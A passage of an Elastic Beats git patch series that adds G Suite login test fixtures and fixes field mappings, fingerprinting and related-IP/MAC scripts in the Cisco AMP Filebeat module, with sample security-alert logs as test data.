"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "account_disabled_generic", @@ -223,6 +391,63 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "gov_attack_warning", diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 0fb518b351df..2ad5d52f7de8 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 261bf54dbf6c..9bc77dc7d039 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json @@ -51,6 +51,162 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "account_disabled_generic", "event.category": [ @@ -207,6 +363,59 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "gov_attack_warning", "event.category": [ From 9f05d498b6a12dacfe775ee54e699396a2f2ddda Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 19:10:37 -0400 Subject: [PATCH 12/20] [Filebeat][Cisco AMP] Pipeline fixes for related mac/ip and mitre tactics fields. (#24661) (#24753) * changing foreach processors to remove null value fields from related fields * splitting up test files and fixing document_id generation, and some field typos * removing lines from painless script that isn't really necessary * mage fmt update to format python code * reverting CI changes for now, will be moved to separate PR * reduce test logs and add fixes to pipeline * update changelog (cherry picked from commit 45cd39448df9211f14b32871c80cc44fe9818b76) Co-authored-by: Marius Iversen --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 42 +- .../module/cisco/amp/_meta/fields.yml | 24 +- .../module/cisco/amp/config/config.yml | 6 +- .../module/cisco/amp/ingest/pipeline.yml | 64 +- .../cisco/amp/test/cisco_amp.ndjson.log | 8 - .../test/cisco_amp.ndjson.log-expected.json | 87 - .../cisco/amp/test/cisco_amp1.ndjson.log | 49 + .../test/cisco_amp1.ndjson.log-expected.json | 2356 ++++++++ .../cisco/amp/test/cisco_amp2.ndjson.log | 922 +-- .../test/cisco_amp2.ndjson.log-expected.json | 5290 +++-------------- .../cisco/amp/test/cisco_amp3.ndjson.log | 45 + .../test/cisco_amp3.ndjson.log-expected.json | 2828 +++++++++ .../cisco/amp/test/cisco_amp4.ndjson.log | 100 + .../test/cisco_amp4.ndjson.log-expected.json | 3294 ++++++++++ .../cisco/amp/test/cisco_amp5.ndjson.log | 62 + .../test/cisco_amp5.ndjson.log-expected.json | 2575 ++++++++ .../cisco/amp/test/cisco_amp6.ndjson.log | 53 + .../test/cisco_amp6.ndjson.log-expected.json | 2425 ++++++++ .../cisco/amp/test/cisco_amp7.ndjson.log | 49 + .../test/cisco_amp7.ndjson.log-expected.json | 2349 ++++++++ x-pack/filebeat/module/cisco/fields.go | 2 +- 22 files changed, 17092 insertions(+), 5539 deletions(-) delete mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log delete mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 5996e2490954..341fe104bdc4 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -397,6 +397,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Keep cursor state between httpjson input restarts {pull}20751[20751] - New juniper.srx dataset for Juniper SRX logs. {pull}20017[20017] - Added DNS response IP addresses to `related.ip` in Suricata module. {pull}22291[22291] +- Updating field mappings for Cisco AMP module, fixing certain fields. {pull}24661[24661] *Heartbeat* diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index a484eab015c8..c41cc67fb652 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -21078,7 +21078,7 @@ type: keyword -- -*`cisco.amp.file.archived_file.identify.sha256`*:: +*`cisco.amp.file.archived_file.identity.sha256`*:: + -- SHA256 hash of the archived file related to the malicious event. @@ -21288,12 +21288,52 @@ type: flattened -- +*`cisco.amp.mitre_tactics`*:: ++ +-- +Array of all related mitre tactic ID's + + +type: keyword + +-- + *`cisco.amp.techniques`*:: + -- List of all MITRE techniques related to the incident found. +type: flattened + +-- + +*`cisco.amp.mitre_techniques`*:: ++ +-- +Array of all related mitre technique ID's + + +type: keyword + +-- + +*`cisco.amp.command_line.arguments`*:: ++ +-- +The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + +type: keyword + +-- + +*`cisco.amp.bp_data`*:: ++ +-- +Endpoint isolation information + + type: flattened -- diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml index de20fe61484f..ff246eeaa45f 100644 --- a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -160,7 +160,7 @@ description: > SHA1 hash of the archived file related to the malicious event. - - name: file.archived_file.identify.sha256 + - name: file.archived_file.identity.sha256 type: keyword description: > SHA256 hash of the archived file related to the malicious event. @@ -265,7 +265,27 @@ description: > List of all MITRE tactics related to the incident found. + - name: mitre_tactics + type: keyword + description: > + Array of all related mitre tactic ID's + - name: techniques type: flattened description: > - List of all MITRE techniques related to the incident found. \ No newline at end of file + List of all MITRE techniques related to the incident found. + + - name: mitre_techniques + type: keyword + description: > + Array of all related mitre technique ID's + + - name: command_line.arguments + type: keyword + description: > + The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + - name: bp_data + type: flattened + description: > + Endpoint isolation information \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 8e4695d7458b..0aa38440947e 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -62,14 +62,14 @@ processors: fields: [message] target: json - if: - has_fields: ["json.data.id"] + has_fields: ["json.data.detection_id"] then: - fingerprint: - fields: ["json.data.id"] + fields: ["json.data.detection_id"] target_field: "@metadata._id" else: - fingerprint: - fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] + fields: ["json.data.timestamp", "json.data.timestamp_nanoseconds", "json.data.event_type_id", "json.data.connector_guid"] target_field: "@metadata._id" - add_fields: target: '' diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml index b77c3be1f9cd..b75214cc2972 100644 --- a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -76,6 +76,15 @@ processors: ignore_failure: true if: ctx?.cisco?.amp?.start_timestamp != null +- rename: + field: cisco.amp.techniques + target_field: cisco.amp.mitre_techniques + if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String" +- rename: + field: cisco.amp.tactics + target_field: cisco.amp.mitre_tactics + if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String" + ###################### ## ECS Host Mapping ## ###################### @@ -189,6 +198,10 @@ processors: field: cisco.amp.file.parent.process_id target_field: process.pid ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true - rename: field: cisco.amp.file.parent.file_name target_field: process.name @@ -205,10 +218,9 @@ processors: field: cisco.amp.file.parent.identity.md5 target_field: process.hash.md5 ignore_missing: true - - rename: - field: cisco.amp.network_info.parent.process_id - target_field: process.pid + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 ignore_missing: true - rename: field: cisco.amp.network_info.parent.file_name @@ -300,21 +312,39 @@ processors: value: "{{ cisco.amp.computer.external_ip }}" if: ctx?.cisco?.amp?.computer?.external_ip != null allow_duplicates: false -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: related.ip - value: "{{ _ingest._value.ip }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.related == null) { + ctx.related = new HashMap(); + } + if (ctx?.related?.ip == null) { + ctx.related.ip = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.ip != null && !addr.ip.isEmpty()) { + if (!ctx?.related?.ip.contains(addr.ip)) { + ctx?.related?.ip.add(addr.ip); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: cisco.amp.related.mac - value: "{{ _ingest._value.mac }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.cisco?.amp?.related == null) { + ctx.cisco.amp.related = new HashMap(); + } + if (ctx?.cisco?.amp?.related?.mac == null) { + ctx.cisco.amp.related.mac = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.mac != null && !addr.mac.isEmpty()) { + if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) { + ctx?.cisco?.amp?.related?.mac.add(addr.mac); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null - foreach: field: cisco.amp.vulnerabilities diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log deleted file mode 100644 index 14599ecfc0cc..000000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log +++ /dev/null @@ -1,8 +0,0 @@ -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} -{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} -{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not 